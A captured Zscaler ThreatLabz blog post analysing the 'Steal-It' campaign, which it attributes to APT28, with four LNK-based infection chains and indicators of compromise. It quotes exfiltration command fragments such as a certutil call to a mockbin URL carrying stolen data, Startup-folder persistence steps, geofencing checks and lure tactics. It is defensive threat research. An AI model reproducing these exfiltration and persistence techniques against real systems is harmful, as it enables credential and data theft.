www.zscaler.com
Open in
urlscan Pro
2606:4700::6812:1c4a
Public Scan
URL:
https://www.zscaler.com/blogs/security-research/steal-it-campaign
Submission: On November 23 via manual from IN — Scanned from DE
Submission: On November 23 via manual from IN — Scanned from DE
Form analysis 3 forms found in the DOM
<form class="topSearch_searchInputWrapper__pYYBt" __bizdiag="107944136" __biza="W___"><input type="text" name="query" class="topSearch_searchInput__N_10L" placeholder="What are you looking for?" aria-label="What are you looking for?"
aria-hidden="true" tabindex="-1" value=""></form><form class="marketoForm_root__OkMwH marketoForm_variant_cta_module__RcBac" id="mktoForm_7971" style="opacity:0" __bizdiag="196539198" __biza="W___"></form><form class="marketoForm_root__OkMwH marketoForm_variant_footer__vL4cA footer-subscription" id="mktoForm_1944" style="opacity:0" __bizdiag="196360362" __biza="W___"></form>Text Content
This site uses JavaScript to provide a number of functions, to use this site
please enable JavaScript in your browser.
Live Global Events: Secure, Simplify, and Transform Your Business.
See Agenda and Locations
Close
OpenSearch
CXO REvolutionariesCareersPartnersSupport
ShowContact UsOptions
Get in touch1-408-533-0288Chat with us
ShowSign InOptions
admin.zscaler.netadmin.zscalerone.netadmin.zscalertwo.netadmin.zscalerthree.netadmin.zscalerbeta.netadmin.zscloud.netZscaler
Private Access
Home
The Zscaler ExperienceProducts & SolutionsPlatformResourcesCompany
Request a demoopen search
open navigation
The Zscaler Experience
Zscaler: A Leader in the 2023 Gartner® Magic Quadrant™ for Security Service Edge
(SSE)
Get the full report
Your world, secured
Experience the transformative power of zero trust.
The Zscaler Difference
The Zscaler Difference
Experience the World’s Largest Security Cloud
Customer Success Stories
Analyst Recognition
Machine Learning and AI at Zscaler
Reduce Your Carbon Footprint
Zero Trust Fundamentals
Zero Trust Fundamentals
What is Zero Trust?
What Is Security Service Edge (SSE)?
What Is Secure Access Service Edge (SASE)?
What Is Zero Trust Network Access (ZTNA)?
What Is Secure Web Gateway (SWG)?
What Is Cloud Access Security Broker (CASB)?
What Is Cloud Native Application Protection Platform (CNAPP)?
Zero Trust Resources
Products & Solutions
Secure Your Users
Provide users with seamless, secure, reliable access to applications and data.
Secure Your Workloads
Build and run secure cloud apps, enable zero trust cloud connectivity, and
protect workloads from data center to cloud.
Secure Your IoT and OT
Provide zero trust connectivity for IoT and OT devices and secure remote access
to OT systems.
Products
Products
Transform your organization with 100% cloud native services
Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Data Protection (CASB/DLP)
Digital Experience (ZDX)
Posture Control
Partner IntegrationsIndustry and Market Solutions
Solution Areas
Solution Areas
Propel your business with zero trust solutions that secure and connect your
resources
Stop Cyberattacks
Protect Data
Zero Trust App Access
VPN Alternative
Accelerate M&A Integration
Optimize Digital Experiences
Zero Trust Branch Connectivity
Build and Run Secure Cloud Apps
Zero Trust for IoT/OT
Zero Trust for Private 5G
Find a product or solution
Platform
Zero Trust Exchange Platform
Learn how Zscaler delivers zero trust with a cloud native platform that is the
world’s largest security cloud
Zero Trust Exchange PlatformTitle Link
Transform with Zero Trust Architecture
Transform with Zero Trust Architecture
Propel your transformation journey
Secure Digital Transformation
Network Transformation
Application Transformation
Security Transformation
Secure Your Business Goals
Secure Your Business Goals
Achieve your business and IT initiatives
Ensure Secure Business Continuity
Accelerate M&A and Divestitures
Recession-Proof Your Enterprise
Secure Your Hybrid Workforce
Download Zscaler Client Connectors
Resources
Learn, connect, and get support.
Explore tools and resources to accelerate your transformation and secure your
world
Learn, connect, and get support.Title Link
Amplifying the voices of real-world digital and zero trust pioneers
Visit now
Resource Center
Resource Center
Stay up to date on best practices
Resource Library
Blog
Customer Success Stories
Webinars
Zpedia
Events & Trainings
Events & Trainings
Find programs, certifications, and events
Upcoming Events
Zenith Live
Zscaler Academy
Interactive Zscaler Whiteboard Workshop
Security Research & Services
Security Research & Services
Get research and insights at your fingertips
ThreatLabz Analytics
Tools
Tools
Tools designed for you
Security Preview
Security and Risk Assessment
Security Advisory Updates
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support
Community & Support
Connect and find support
Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Explore the latest Zscaler Innovations
Industry & Market Solutions
Industry & Market Solutions
See solutions for your industry and country
Public Sector
Healthcare
Financial Services
See all
Resource Center
Resource Center
Stay up to date on best practices
Resource Library
Blog
Customer Success Stories
Webinars
Zpedia
Events & Trainings
Events & Trainings
Find programs, certifications, and events
Upcoming Events
Zenith Live
Zscaler Academy
Interactive Zscaler Whiteboard Workshop
Security Research & Services
Security Research & Services
Get research and insights at your fingertips
ThreatLabz Analytics
Tools
Tools
Tools designed for you
Security Preview
Security and Risk Assessment
Security Advisory Updates
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support
Community & Support
Connect and find support
Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Explore the latest Zscaler Innovations
Industry & Market Solutions
Industry & Market Solutions
See solutions for your industry and country
Public Sector
Healthcare
Financial Services
See all
Company
About Zscaler
Discover how it began and where it’s going
Partners
Meet our partners and explore system integrators and technology alliances
News & Announcements
Stay up to date with the latest news
Leadership Team
Meet our management team
Partner Integrations
Explore best-in-class partner integrations to help you accelerate digital
transformation
Investor Relations
See news, stock information, and quarterly reports
Environmental, Social & Governance
Learn about our ESG approach
Careers
Join our mission
Press Center
Find everything you need to cover Zscaler
Compliance
Understand our adherence to rigorous standards
Zenith Ventures
Understand our adherence to rigorous standards
ZSCALER BLOG
Get the latest Zscaler blog updates in your inbox
Subscribe
Security Research
STEAL-IT CAMPAIGN
NIRAJ SHIVTARKAR, AVINASH KUMAR
September 06, 2023 - 14 min read
Threatlabz Research
Contents
1. Introduction
2. Key Takeaways
3. Campaign Analysis
4. NTLMv2 Hash Stealing Infection Chain
5. SystemInfo Stealing Infection Chain
6. Fansly Whoami Exfil Infection Chain
7. Windows Update Exfil Infection Chain
8. Threat Actor Attribution
9. Conclusion
10. Zscaler Sandbox Coverage
11. MITRE ATT&CK TTP Mapping
12. Indicators of Compromise (IoCs)
13. More blogs
Copy URL
Copy URL
INTRODUCTION
Zscaler ThreatLabz recently discovered a new stealing campaign dubbed as the
"Steal-It" campaign. In this campaign, the threat actors steal and exfiltrate
NTLMv2 hashes using customized versions of Nishang's Start-CaptureServer
PowerShell script, executing various system commands, and exfiltrating the
retrieved data via Mockbin APIs.
Through an in-depth analysis of the malicious payloads, our team observed a
geofencing strategy employed by the campaign, with specific focus on targeting
regions including Australia, Poland, and Belgium. These operations use
customized PowerShell scripts, designed to pilfer crucial NTLM hashes before
transmitting it to the Mockbin platform. The initial phase of the campaign
involves the deployment of LNK files concealed in zip archives, while ensuring
persistence within the system through strategic utilization of the StartUp
folder. Additionally, the gathered system information and NTMLv2 hashes are
exfiltrated using Mockbin APIs.
We believe the Steal-It campaign may be attributed to APT28 (aka Fancy Bear)
based on its similarities with the APT28 cyber attack reported by CERT-UA in the
Threat Actor Attribution section.
KEY TAKEAWAYS
- Exfiltration Tactics: We discovered that the threat actor steals and
exfiltrates NTLM hashes using customized scripts from the Nishang framework and
system information by executing system commands. Once captured, the data is
exfiltrated via mock APIs.
- Explicit Images as Lures: The Fansly Whoami Exfil and Exfil Sysinfo OnlyFans
infection chain variations use explicit images of models to entice victims to
execute the initial payload.
- Geofencing and Targeted Regions: Threat actors use a geofencing strategy with
specific focus on targeting regions including Australia, Poland, and Belgium.
- Mockbin as a Service: We observed the use of Mockbin, an API endpoint
generating tool, and mock APIs to transfer stolen data such as NTLM hashes and
command output.
CAMPAIGN ANALYSIS
After analyzing multiple samples for the Steal-It campaign, we categorized the
infection chains based on the variations observed in the TTPs. The sections
below depict these infection chains.
NTLMV2 HASH STEALING INFECTION CHAIN
How it works
Figure 1: NTLMv2 hash stealing infection chain flow
Overview
The NTLMv2 hash stealing infection chain steals NTLMv2 hashes by utilizing a
customized version of Nishang’s Start-CaptureServer PowerShell script and
transmitting the stolen hashes via mocky API’s to Mockbin.
Technical Analysis
The infection chain begins with a ZIP archive bundled with a malicious LNK
(shortcut) file, the LNK file is commissioned to download and execute another
PowerShell script from mockbin[.]org and webhook[.]site as seen in the
screenshot below.
Figure 2: Initial LNK File downloading & executing a customized Nishang’s
Start-CaptureServer PowerShell script
The PowerShell Script executed by the malicious LNK file is a customized version
of Nishang’s Start-CaptureServer.ps1 script that is especially developed to
capture NTLMv2 hashes.
The threat actors modified Start-CaptureServer.ps1 by removing:
* comments
* detectable strings ito evade static detections
* basic authentication method for capturing credentials
The most significant modification our team observed was that the captured
base64-encoded NTLMv2 hashes are exfiltrated by calling the
Net.WebClient.DownloadString() function with the URL:
https[:]//mockbin.org/bin/<id>”as an argument. This is depicted in the
screenshot below.
Figure 3: A customized version of Nishang’s Start-CaptureServer PowerShell
script
Once the DownloadString() function is executed, it performs a GET request to the
specified mockbin.org URL.
Mockbin enables you to create custom endpoints for testing, mocking, and
monitoring HTTP requests and responses across different libraries, sockets, and
APIs. When the GET request is made to the Mockbin URL with a captured
base64-encoded NTMLv2 hash, the request is logged on the server side and can be
tracked by threat actors.
SYSTEMINFO STEALING INFECTION CHAIN
How it works
Figure 4: Systeminfo stealing infection chain flow
Overview
The Systeminfo stealing infection chain uses the OnlyFans brand to entice users
into downloading the later stages of the chain, which exfiltrate command outputs
to Mockbin.
Technical Analysis
This infection chain starts with a ZIP archive named “best_tits.zip” bundled
with a malicious LNK (shortcut) file called onlyfans.com-1.lnk.
Upon execution, the malicious LNK file runs a command that opens the Microsoft
Edge browser with a base64 encoded argument. This argument is a JavaScript one
liner redirecting to the http://run[.]mocky[.]io/v3/<id> URL using
location.href. This is depicted in the screenshot below.
Figure 5: Initial LNK file - OnlyFans
To conceal the malicious redirection, the command also opens the legitimate
OnlyFans website in another tab and pauses execution for 9 seconds.
Now the opened run[.]mocky[.]io URL is a HTML page with malicious JavaScript
code that performs the following actions:
* Verifies if the userAgent header includes the keyword "win" to determine if
the operating system being used is Windows.
* Utilizes the IPAPI Geolocation API to check if the country code is "AU"
(Australia).
Specifically looking for the “AU” country code indicates the infection chain is
geofenced and targeting users from Australia.
If the user’s operating system is Windows and they are located in Australia, the
code proceeds to download another malicious LNK file named m8. This file is
created by decoding a base64-encoded blob of data, as illustrated in the
screenshot below.
Figure 6: Run[.]Mocky[.]io HTML page geofenced to target users from Australia
Furthermore, the downloaded LNK file is copied to the Startup folder as
specified in the argument of the previous LNK file: move /y
%userprofile%\Downloads\m8 m8.lnk.
Since the working directory of the previous LNK file is set to the Startup
folder path, the LNK file is copied into the Startup folder. Because of this,
the m8.lnk file will be executed every time the system is restarted, allowing
persistence on the system.
When executed, the downloaded LNK file m8.lnk downloads a CMD file from
run[.]mocky[.]io and copies it to the Startup folder as m8.cmd, following the
same method as the previous LNK file. These actions are depicted in the
screenshot below.
Figure 7: LNK file downloading the final script
The CMD file m8.cmd is executed on a system reboot, and is the final script
commissioned to gather and exfiltrate the system information. Once executed, it
first runs the following three system commands and stores the output in the
ProgramData directory.
* ipconfig
* systeminfo
* tasklist
From here, the script base64 encodes the command output files using CertUtil and
sets environment variables for the base64-encoded command outputs using set /p
ipc=<%programdata%\<b64enc_cmdoutput>.
The newly set environment variables are exfiltrated by performing a GET request
to the mockbin[.]org using certutil -urlcache -f
<http[:]//mockbin[.]org/bin/<id>/%env_var%. The environment variables are passed
on in the request as shown in the screenshot.
Figure 8: Final script - Execute system commands and exfiltrate output to
Mockbin.org
Towards the end of the script, clean up takes place where the command output
files are deleted and the command outputs of executed commands: ipconfig,
systeminfo, tasklist are exfiltrated to Mockbin URL.
FANSLY WHOAMI EXFIL INFECTION CHAIN
How it works
Figure 9: Fansly whoami exfil infection chain flow
Overview
The Fansly whoami exfil infection chain uses the Fansly brand to entice users
into downloading the later stages of the chain, which exfiltrate command outputs
to Mockbin.
Technical Analysis
This infection chain begins with a ZIP archive bundled with a malicious LNK
(shortcut) file. The LNK file opens the http://run[.]mocky[.]io/v3/<id> URL in a
browser, which consists of an HTML page with malicious Javascript. This HTML
page is different from the page described in the "Systeminfo stealing infection
chain" section. In this case, the JavaScript performs the following actions:
* Verifies if the userAgent header includes the keyword "win" to determine if
the operating system being used is Windows.
* Utilizes the IPAPI Geolocation API to check if the country code is "PL"
(Poland).
* Verifies whether the IP address version is "ipv4"
Specifically looking for the “PL” country code indicates the infection chain is
geofenced and targeting users from Poland.
If all of the conditions above are satisfied, the JavaScript downloads a ZIP
file named fansly.zip by decoding a large base64 blob. The ZIP file includes
three explicit JPEG images of Ukrainian and Russian Fansly models to lure users
into downloading a malicious batch file, called fansly.com_online.bat, bundled
inside the same ZIP archive.
Figure 10: Explicit images of Ukrainian & Russian Fansly models used to entice
users into downloading a hidden file
Once executed, the fansly.com_online.cmd batch script performs the following
actions:
* Writes a VBScript & a batch script in the ProgramData directory and executes
the VBscript.
* The VBScript opens real Fansly model profiles to conceal the malicious
actions and then executes the batch script written in the ProgramData
directory.
* Once executed, the batch script:
* kills any running msedge.exe process
* deletes any .css files in the downloads folder
* opens a mockbin[.]org URL which downloads a eucv8o.css file into the
Downloads folder
* moves eucv8o.css into the ProgramData directory as eucv8o.cmd and then
executes
When the mockbin[.]org URL is opened by the batch script in an Microsoft Edge
browser, the JavaScript performs the following actions:
* Verifies if the userAgent header includes the keyword "win" to determine if
the operating system being used is Windows.
* Ensures that userAgent does not contain the string “wow” which indicates that
the 32-bit process is running in a 64-bit Windows machine.
* Checks if the browser version (Chrome/Firefox”UserAgent - Microsoft Edge also
uses Chrome) is greater than "100".
If all conditions above are satisfied, the JavaScript redirects to another
mockbin[.]org URL which executes another JavaScript code that performs the
following actions:
* Verifies if the userAgent header includes the string “edg” to determine if
the Microsoft Edge browser is being used.
* Leverages the IPAPI Geolocation API to check if the country code is "PL"
(Poland)
If all the conditions above are met, a eucv8o.css file is downloaded by decoding
a base64 blob in the Downloads folder. As mentioned above, eucv8o.css is moved
into the ProgramData directory as eucv8o.cmd and then executed:
* kills the msedge.exe process
* executes “whoami” command and stores the output in the ProgramData directory
* sets the environment variable dobpyk to the output of the whoami command
* exfiltrates the output of the WHOAMI command to the mockbin[.]org URL by
sending a GET request with the appended command output, like this:
mockbin[.]org/bin/<id>/<cmd_output>
* deletes the command output file and the downloaded .css file
The execution flow is depicted in the screenshot below:
Figure 11: Execute whoami and exfiltrate the output to Mockbin.org
WINDOWS UPDATE EXFIL INFECTION CHAIN
How it worksFigure 12: Windows update exfil infection chain flow
Overview
In our analysis of this infection chain, we observed a ZIP archive bundled with
a LNK file that uses geofencing techniques to target users in Belgium and
unknowingly downloading multiple stages of a PowerShell script that executes
system commands to collect basic information for nefarious purposes.
Interestingly, we saw a similar infection reported by CERT-UA which was
attributed to APT28.
Technical Analysis
For this infection chain, the initial vector is a malicious LNK file bundled
inside a ZIP archive (e.g. command_powershell.zip). The malicious LNK file opens
the run[.]mocky[.]io URL using Microsoft Edge. This downloads a c1 file into the
Downloads folder, which is then moved into the Startup folder as c1.bat,
maintaining persistence on the machine. Whenever the system is restarted, c1.bat
is executed.
Figure 13: Initial LNK file
Once opened, the run[.]mocky[.]io URL executes a JavaScript code which downloads
a batch script from a base64-encoded blob. The batch script is downloaded to the
Downloads folder, where it is then renamed to c1.bat and moved into the Startup
folder.
c1.bat includes the “Window Update” title (identical to the phishing email
subject) and is primed to download another script from run[.]mocky[.]io into the
ProgramData directory using CertUtil.
To conceal the malicious activity, the batch script shows an seemingly innocuous
message on the console with a progress bar. The message reads:
“Dynamic Update for Windows Systems (KB5021043)”
This is depicted in the image below.
Figure 14: Fake Windows update BAT script execution to download the additional
stages
The LNK file opens a run[.]mocky[.]io URL using Microsoft Edge, which then
performs following actions:
* Verifies if the userAgent header includes the keyword "edg" to determine if
the browser used is “Microsoft Edge”
* Utilizes the IPAPI Geolocation API to check if the country code is "BE"
(Belgium)
Specifically looking for the “BE” country code indicates the infection chain is
geofenced and targeting users from Belgium.
Figure 15: Geofenced HTML that target users from Belgium
If both the conditions above are satisfied, a b4.css script is downloaded into
the Downloads folder by decoding a base64 blob. The script is then moved into
the Startup folder and renamed to b4.cmd. This helps threat actors maintain
persistence like in the other infection chains.
Upon execution, b4.cmd opens another run[.]mocky[.]io URL using Microsoft Edge,
which is similar to the JavaScript code seen in Figure 15.
The JavaScript code executes the batch script with the title “Window Update” and
displays a an innocent message on the console with a progress bar stating:
“Dynamic Update for Windows Systems (KB5021043)”
From here, another script is downloaded from run[.]mocky[.]io in the ProgramData
directory using CertUtil to execute it.
During the analysis, the Mocky URL was inaccessible, therefore while searching
for similar scripts with the “Window Update” messages as shown in Figure 14, we
discovered a PowerShell script which executes a final set of PowerShell commands
downloaded from run[.]mocky[.]io. This script also uses the window title as
“Updating Windows” and the message “Dynamic Cumulative Update for Windows
(KB5023696)” to conceal malicious intentions as depicted in the screenshot below
and was also reported previously.
Figure 16: Fake Windows update PowerShell script executes system commands and
exfiltrates output
The final set of PowerShell commands in this script are commissioned to execute
the commands tasklist and systeminfo on the system, and then use
WebClient.UploadString() to exfiltrate the command output to the mockbin[.]org
URL using a POST request as shown below.
In addition to system information, we also observed cases where the full file
paths were exfiltrated to mockbin[.]org by executing the “Get-ChildItem -Path
<path> -Recurse -File | select FullName” command and then exfiltrate the command
output using WebClient.UploadString().
THREAT ACTOR ATTRIBUTION
Our team believes that the Steal-It campaign could be attributed to APT28,
Russian cyber espionage group with medium confidence level. The similarities
between our observations of these four infection chains discussed in the
Steal-It Campaign and the APT28 cyber attack reported by CERT-UA (Computer
Emergency Response Team of Ukraine) are striking. The Steal-It Campaign and the
CERT-UA’s report shared the following:
* Similar PowerShell scripts for exfiltrating system information and the
downloading of further stages with varied infection chain.
* Similar Mockbin URLs in payloads and abusing Mockbin API’s for hosting
scripts and exfiltration of information.
* Similar TTPs such as gathering system information by executing commands and
exfiltration of data using Mockbin APIs
* Similar “Windows Update” theme.
CONCLUSION
Zscaler ThreatLabz’s analysis of the Stealing campaign named as “The Steal-It
Campaign” indicates their targeted geofencing strategy and sophisticated
tactics. For example, the threat actors' custom PowerShell scripts and strategic
use of LNK files within zip archives highlights their technical expertise. The
persistence maintained by moving files from the Downloads to Startup folder and
renaming them underscores the Threat Actors dedication to prolonged access.
The meticulousness and technical process demonstrated by the Steal-It campaign
emphasizes the importance of robust cybersecurity measures. In addition to
staying on top of these threats, Zscaler's ThreatLabz team continuously monitors
for new threats and shares its findings with the wider community.
ZSCALER SANDBOX COVERAGE
Zscaler's multilayered cloud security platform detects indicators at various
levels. During the investigation of this campaign, Zscaler Sandbox played a
crucial role in analyzing the behavior of various files. Through this sandbox
analysis, the threat scores and specific MITRE ATT&CK techniques triggered were
identified, as illustrated in the screenshot provided below. This comprehensive
approach empowers cybersecurity professionals with critical insights into the
malware's behavior, enabling them to effectively detect and counter the threats
posed by the Threat Actors.
The image below shows the Zscaler cloud sandbox report for LNK Files attributed
to APT28 (LNK.Downloader.APT28).
Figure 17: Zscaler sandbox detection
In addition to sandbox detection, Zscaler’s multilayered cloud security platform
detects indicators at various levels.
LNK.Downloader.APT28
MITRE ATT&CK TTP MAPPING
IDTECHNIQUE NAMET1598PhishingT1059Command and Scripting
InterpreterT1212Exploitation for Credential AccessT1567Exfiltration Over Web
ServiceT1037Startup Items
INDICATORS OF COMPROMISE (IOCS)
NTLMv2 Hash Stealing
LNK
* 022d01e7007971f5a5096c4f2f2b2aa4
* 1e2a320658ba5b616eae7a3e247f44a6
Customized Nishang Start-CaptureServer PowerShell script
* URL: mockbin[.]org/bin/de22e2a8-d2af-4675-b70f-e42f1577da6e
* URL: https[:]//webhook[.]site/33128548-0eda-4e2b-bf89-7b1b225ecb9f
* Script: 358d9271b8e207e82dafe6ea67c1d198
SystemInfo Stealing
LNK
* 4083396ab0344c4731a30d4931bb1963
URL
* http[:]//run[.]mocky[.]io/v3/cee6d18e-5adb-4fbd-b47b-989768473c66
* http[:]//run[.]mocky[.]io/v3/99c677eb-21e1-4064-9ab4-9ee9dfd2ef13
Fansly Whoami Exfil
URL
* https[:]//run.mocky.io/v3/869e530a-51f7-4bec-ae6e-3effb1737691
* https[:]//run.mocky.io/v3/f4ccbf43-9f2a-4c08-af0a-35be079694a8
Windows Update Exfil
LNK
* 02af0a334507fcdf7b374dff90eddead
* 468afeebde1c65b96e6d10e11428598e
* c95eed189823c9a2c7206d13ff953bdf
URL
* http[:]//run[.]mocky[.]io/v3/2e757b51-c023-4bb6-9d3f-68489571abd7
* https[:]//run[.]mocky[.]io/v3/e0687bb8-d14b-4ee0-8c47-202c5aaab48c
* http[:]//run[.]mocky[.]io/v3/ef2c9f34-11f5-4a99-b31c-6b203b5d5313
Thank you for reading
WAS THIS POST USEFUL?
Yes, very!
Not really
EXPLORE MORE ZSCALER BLOGS
A peek into APT36’s updated arsenal
Read Post
Technical Analysis of HijackLoader
Read Post
Rise in Tech-Support Scams Abusing Windows Action Center Notifications
Read Post
GET THE LATEST ZSCALER BLOG UPDATES IN YOUR INBOX
By submitting the form, you are agreeing to our privacy policy.
THE ZSCALER EXPERIENCE
Learn about:
Your world, secured.Zero TrustSecurity Service Edge (SSE)Secure Access Service
Edge (SASE)Zero Trust Network Access (ZTNA)Secure Web Gateway (SWG)Cloud Access
Security Broker (CASB)Cloud Native Application Protection Platform (CNAPP)
PRODUCTS & SOLUTIONS
Secure Your Users
Secure Your Workloads
Secure Your IoT and OT
Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Data Protection (CASB/DLP)
Digital Experience (ZDX)
Posture Control
Industry & Market Solutions
Partner Integrations
Zscaler Client Connector
PLATFORM
Zero Trust Exchange Platform
Secure Digital Transformation
Application Transformation
Network Transformation
Security Transformation
RESOURCES
Resource Library
Security Preview
Security & Risk Assessment
ThreatLabz Analytics & Insights
Upcoming Events
Blog
Zscaler Academy
CXO Revolutionaries
Zpedia
Ransomware Protection ROI Calculator
POPULAR LINKS
Pricing & Plans
About Zscaler
Leadership Team
Career Opportunities
Find or Become a Partner
Customer Success Center
Investor Relations
Press Center
News & Announcements
ESG
Compliance
Contact Zscaler
Home
English
EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues
- Brasil
Zscaler is universally recognized as the leader in zero trust. Leveraging the
largest security cloud on the planet, Zscaler anticipates, secures, and
simplifies the experience of doing business for the world's most established
companies.
English
EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues
- Brasil
Visit us on FacebookLinkedinFollow us on TwitterSubscribe our Youtube Channel
SitemapPrivacyLegalSecurity
© 2023 Zscaler, Inc.
All rights reserved. Zscaler™ and other trademarks listed at
zscaler.com/legal/trademarks are either (i) registered trademarks or service
marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States
and/or other countries. Any other trademarks are the properties of their
respective owners.
Zscaler uses cookies to personalize content and ads, to provide social media
features and to analyze our traffic. We also share information about your use of
our site with our social media, advertising and analytics partners.Please review
our Cookies Policy for more information.
Cookies Settings Accept Cookies